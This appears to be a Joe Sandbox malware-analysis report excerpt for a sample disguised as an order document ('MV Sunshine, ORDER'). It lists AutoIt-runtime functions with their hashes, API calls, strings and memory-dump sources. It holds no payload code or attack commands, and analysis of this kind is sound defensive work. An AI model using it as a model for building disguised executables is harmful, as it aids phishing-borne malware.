Instruction ID: c8fae74df262a7ca6ba8d3427587c727791cc67ff92c2cebec47af428be613ac
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: FFC1A3322051A309DF6D873D943403EBAE59EA37B131A1B5EE8B3CB5D4EF20D524E660

Function 009A283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 25e41e3996f16e8c8fc6663c3f6c45444159b3d375edf0ee99ca20055cfc96a7
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 32C192322051A30ADF6D473E943403EBBE59AA37B131A0B6DE4B2DB5D4EF24D524E660

Function 009A1BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: e66f7f1c1b0deebb44abb435379aced5415f6494df42cb7888fec568351431b0
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: ABC184322051A30DDF6D463AD43403EBBE99AA37B171A0B6DE4B3CB5D4EF20D524D660

Function 02223630 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 3c3dce90681401a7344bdcd2dae070d2ef00d34ad0738ec3d892d31c9a7e089e
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 5A41D3B1D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D734AB41DB40

Function 02223520 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: bf0e9af3f21afc9758bcaf224c5ed9ed3a0e371a9c620d849be09957a7626989
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: CC018078A10209EFCB44DF98C5909AEF7B6FB48310F208599E909A7705D735AE51DB80

Function 022234C0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: d2768d98873236260ddf50859e1933e5a5317fb370d0775f74bcaf8013f2e61d
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: BB019278A10219EFCB44DF98C5909AEF7F6FB48310F2085D9D809A7705D735AE51DB80

Function 02221E70 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 009F7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 009F7B70
DeleteObject.GDI32(00000000), ref: 009F7B82
DestroyWindow.USER32 ref: 009F7B90
GetDesktopWindow.USER32 ref: 009F7BAA
GetWindowRect.USER32(00000000), ref: 009F7BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009F7CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009F7D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7D4A
GetClientRect.USER32(00000000,?), ref: 009F7D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009F7D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DD0
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DE8
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DF8
GlobalFree.KERNEL32(00000000), ref: 009F7E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00A12CAC,00000000), ref: 009F7E2B
GlobalFree.KERNEL32(00000000), ref: 009F7E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 009F7E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 009F7E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F808F

Strings

static, xrefs: 009F7D8A, 009F7EE1
AutoIt v3, xrefs: 009F7D42
DISPLAY, xrefs: 009F7EF2
, xrefs: 009F8015

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: ba5748cb557e7ab93e2051a9d8e256979fcf96bbb9f79c94d60157534871975b
Instruction ID: a53e4a75db437c152fc70f17d08d395b440fb76e7fa31d51259777d54c71cb2e
Opcode Fuzzy Hash: ba5748cb557e7ab93e2051a9d8e256979fcf96bbb9f79c94d60157534871975b
Instruction Fuzzy Hash: 18027E75900109EFDB14DFA8DC89EBEBBB9FB49310F148558F915AB2A1CB719D02CB60

Function 00A037F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00A0F910), ref: 00A038AF
IsWindowVisible.USER32(?), ref: 00A038D3

Strings

GETLINE, xrefs: 00A03C23
SELECTSTRING, xrefs: 00A03A8E
ADDSTRING, xrefs: 00A0399E
EDITPASTE, xrefs: 00A03BE7
CHECK, xrefs: 00A03AF5
GETCURRENTSELECTION, xrefs: 00A03A6B
GETCURRENTCOL, xrefs: 00A03BB0
FINDSTRING, xrefs: 00A039FE
ISENABLED, xrefs: 00A038F3
SETCURRENTSELECTION, xrefs: 00A03A3E
GETLINECOUNT, xrefs: 00A03B4E
UNCHECK, xrefs: 00A03B0B
GETCURRENTLINE, xrefs: 00A03B75
SENDCOMMANDID, xrefs: 00A03C62
HIDEDROPDOWN, xrefs: 00A03988
GETSELECTED, xrefs: 00A03B2B
SHOWDROPDOWN, xrefs: 00A03968
TABRIGHT, xrefs: 00A03925
CURRENTTAB, xrefs: 00A03945
DELSTRING, xrefs: 00A039D1
TABLEFT, xrefs: 00A0390F
ISCHECKED, xrefs: 00A03AC1
ISVISIBLE, xrefs: 00A038BF

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 630b5e12d439549facc050bf959e4ee10c836ddf51c838f3e7cfe16c31a653d1
Instruction ID: 1eee810acf6c4f5a08379257a78458540d0b06ea6b1e46a1b939219a5d038267
Opcode Fuzzy Hash: 630b5e12d439549facc050bf959e4ee10c836ddf51c838f3e7cfe16c31a653d1
Instruction Fuzzy Hash: D9D161712143099FCF14FF50D491B6AB7AAAFD5344F148459B8869B3E2CB31EE0ACB91

Function 00A0A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00A0A89F
GetSysColorBrush.USER32(0000000F), ref: 00A0A8D0
GetSysColor.USER32(0000000F), ref: 00A0A8DC
SetBkColor.GDI32(?,000000FF), ref: 00A0A8F6
SelectObject.GDI32(?,?), ref: 00A0A905
InflateRect.USER32(?,000000FF,000000FF), ref: 00A0A930
GetSysColor.USER32(00000010), ref: 00A0A938
CreateSolidBrush.GDI32(00000000), ref: 00A0A93F
FrameRect.USER32(?,?,00000000), ref: 00A0A94E
DeleteObject.GDI32(00000000), ref: 00A0A955
InflateRect.USER32(?,000000FE,000000FE), ref: 00A0A9A0
FillRect.USER32(?,?,?), ref: 00A0A9D2
GetWindowLongW.USER32(?,000000F0), ref: 00A0A9FD

Part of subcall function 00A0AB60: GetSysColor.USER32(00000012), ref: 00A0AB99
Part of subcall function 00A0AB60: SetTextColor.GDI32(?,?), ref: 00A0AB9D
Part of subcall function 00A0AB60: GetSysColorBrush.USER32(0000000F), ref: 00A0ABB3
Part of subcall function 00A0AB60: GetSysColor.USER32(0000000F), ref: 00A0ABBE
Part of subcall function 00A0AB60: GetSysColor.USER32(00000011), ref: 00A0ABDB
Part of subcall function 00A0AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A0ABE9
Part of subcall function 00A0AB60: SelectObject.GDI32(?,00000000), ref: 00A0ABFA
Part of subcall function 00A0AB60: SetBkColor.GDI32(?,00000000), ref: 00A0AC03
Part of subcall function 00A0AB60: SelectObject.GDI32(?,?), ref: 00A0AC10
Part of subcall function 00A0AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00A0AC2F
Part of subcall function 00A0AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A0AC46
Part of subcall function 00A0AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00A0AC5B

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 896ffd0502d68c7d1378cd27f608cc810165ee3aef7e382f3ea8c9bc58aa1174
Instruction ID: c8fb618d4ddecd2b3f541c82a03a835bdee9c35d3b3f313656122fcc80df9503
Opcode Fuzzy Hash: 896ffd0502d68c7d1378cd27f608cc810165ee3aef7e382f3ea8c9bc58aa1174
Instruction Fuzzy Hash: F4A18172508309AFD720DFA4DC08E5B7BA9FF89321F104B29F962A61E0D771D946CB52

Function 00982C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00982CA2
DeleteObject.GDI32(00000000), ref: 00982CE8
DeleteObject.GDI32(00000000), ref: 00982CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00982CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00982D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 009BC68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 009BC6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 009BCAED

Part of subcall function 00981B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00982036,?,00000000,?,?,?,?,009816CB,00000000,?), ref: 00981B9A

SendMessageW.USER32(?,00001053), ref: 009BCB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009BCB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009BCB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009BCB62

Strings

0, xrefs: 009BC981

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 72ffdd06838245d493be7d24cc1ffc46263f4d1d0da9f718c42241ee90bd1547
Instruction ID: 987d488319191de218d76c37071481a67d8213101391901c9699321f62fa92fd
Opcode Fuzzy Hash: 72ffdd06838245d493be7d24cc1ffc46263f4d1d0da9f718c42241ee90bd1547
Instruction Fuzzy Hash: A712A1B0604205EFDB24DF24C984BA9B7E9BF45320F5445B9F896DB662CB31EC42CB91

Function 009F77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 009F77F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009F78B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009F78EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009F7900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 009F7946
GetClientRect.USER32(00000000,?), ref: 009F7952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 009F7996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009F79A5
GetStockObject.GDI32(00000011), ref: 009F79B5
SelectObject.GDI32(00000000,00000000), ref: 009F79B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009F79C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009F79D2
DeleteDC.GDI32(00000000), ref: 009F79DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009F7A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 009F7A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 009F7A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009F7A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 009F7A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 009F7AAE
GetStockObject.GDI32(00000011), ref: 009F7AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009F7AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009F7ACE

Strings

static, xrefs: 009F7990, 009F7AA8
msctls_progress32, xrefs: 009F7A4F
AutoIt v3, xrefs: 009F793E
DISPLAY, xrefs: 009F799B

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 95263ebdec2e711398e27a64d6d82e39aac60b7e4fd0cda22a096131460b8947
Instruction ID: 3f70d2f8d2badc841a089a849c556f8f928920afd95f5fa455186bdc6eb32800
Opcode Fuzzy Hash: 95263ebdec2e711398e27a64d6d82e39aac60b7e4fd0cda22a096131460b8947
Instruction Fuzzy Hash: 4EA16175A40219BFEB14DBA4DC4AFAEBBB9EB45710F044114FA15A72E0D7B1AD02CB60

Function 009EAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009EAF89
GetDriveTypeW.KERNEL32(?,00A0FAC0,?,\\.\,00A0F910), ref: 009EB066
SetErrorMode.KERNEL32(00000000,00A0FAC0,?,\\.\,00A0F910), ref: 009EB1C4

Strings

Network, xrefs: 009EB0A4
FileBackedVirtual, xrefs: 009EB193
SCSI, xrefs: 009EB131
RAMDisk, xrefs: 009EB090
PhysicalDrive, xrefs: 009EB012
iSCSI, xrefs: 009EB169
SATA, xrefs: 009EB177
\\.\, xrefs: 009EAFDB
USB, xrefs: 009EB15B
1394, xrefs: 009EB146
SSA, xrefs: 009EB14D
Fixed, xrefs: 009EB0AE
Fibre, xrefs: 009EB154
Virtual, xrefs: 009EB18C
Removable, xrefs: 009EB0B8
ATAPI, xrefs: 009EB138
SAS, xrefs: 009EB170
SSD, xrefs: 009EB0F1
Unknown, xrefs: 009EB086, 009EB12A
CDROM, xrefs: 009EB09A
RAID, xrefs: 009EB162
MMC, xrefs: 009EB185
ATA, xrefs: 009EB13F

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: e027a0e22126529ee0fef9b8c1a5a745bcb7e0b29fa5fd2ae4c5e0606aceb434
Instruction ID: 18f59452df6ddfab7947d20ff7d277e82df668a6cb97da7e045d7a65b8fa5d88
Opcode Fuzzy Hash: e027a0e22126529ee0fef9b8c1a5a745bcb7e0b29fa5fd2ae4c5e0606aceb434
Instruction Fuzzy Hash: C651C330688385BBCB12EB52C9E2A7E73B4BB64351B204C15F44AE7290C739AD41DB42

Function 00986A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00986A91
__wcsnicmp.LIBCMT ref: 00986AA9
__wcsnicmp.LIBCMT ref: 00986AC1
__wcsnicmp.LIBCMT ref: 00986AD9
__wcsnicmp.LIBCMT ref: 00986AF1
__wcsnicmp.LIBCMT ref: 00986B09
__wcsnicmp.LIBCMT ref: 00986B21
__wcsnicmp.LIBCMT ref: 00986B35
__wcsnicmp.LIBCMT ref: 00986B76
__wcsnicmp.LIBCMT ref: 00986B8A
__wcsnicmp.LIBCMT ref: 00986B9E
__wcsnicmp.LIBCMT ref: 00986BB2

Strings

Unterminated group of comments, xrefs: 009BE82C
#requireadmin, xrefs: 00986ABB
Bad directive syntax error, xrefs: 009BE743
#include-once, xrefs: 00986AEB
#ce, xrefs: 00986BAC
#cs, xrefs: 00986B2F, 00986B84
#include, xrefs: 00986B03
#notrayicon, xrefs: 00986AA3
#OnAutoItStartRegister, xrefs: 00986AD3
Cannot parse #include, xrefs: 009BE819
#pragma compile, xrefs: 00986A8B
#comments-start, xrefs: 00986B1B, 00986B70
#comments-end, xrefs: 00986B98

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 60eefc229094234096cac2c3c4259e7c3911b5772c2ea4e154536024ca2eac45
Instruction ID: a1247f725e21cd154d300f3d0f48fdac0afb030b2316425e341de85086927298
Opcode Fuzzy Hash: 60eefc229094234096cac2c3c4259e7c3911b5772c2ea4e154536024ca2eac45
Instruction Fuzzy Hash: 66813671604215BBCB25BF60CD83FEE7B6CAF52710F048425F945AE2C2EB64EA51C3A1

Function 00A0AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00A0AB99
SetTextColor.GDI32(?,?), ref: 00A0AB9D
GetSysColorBrush.USER32(0000000F), ref: 00A0ABB3
GetSysColor.USER32(0000000F), ref: 00A0ABBE
CreateSolidBrush.GDI32(?), ref: 00A0ABC3
GetSysColor.USER32(00000011), ref: 00A0ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A0ABE9
SelectObject.GDI32(?,00000000), ref: 00A0ABFA
SetBkColor.GDI32(?,00000000), ref: 00A0AC03
SelectObject.GDI32(?,?), ref: 00A0AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 00A0AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A0AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 00A0AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A0ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A0ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 00A0ACEC
DrawFocusRect.USER32(?,?), ref: 00A0ACF7
GetSysColor.USER32(00000011), ref: 00A0AD05
SetTextColor.GDI32(?,00000000), ref: 00A0AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A0AD21
SelectObject.GDI32(?,00A0A869), ref: 00A0AD38
DeleteObject.GDI32(?), ref: 00A0AD43
SelectObject.GDI32(?,?), ref: 00A0AD49
DeleteObject.GDI32(?), ref: 00A0AD4E
SetTextColor.GDI32(?,?), ref: 00A0AD54
SetBkColor.GDI32(?,?), ref: 00A0AD5E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
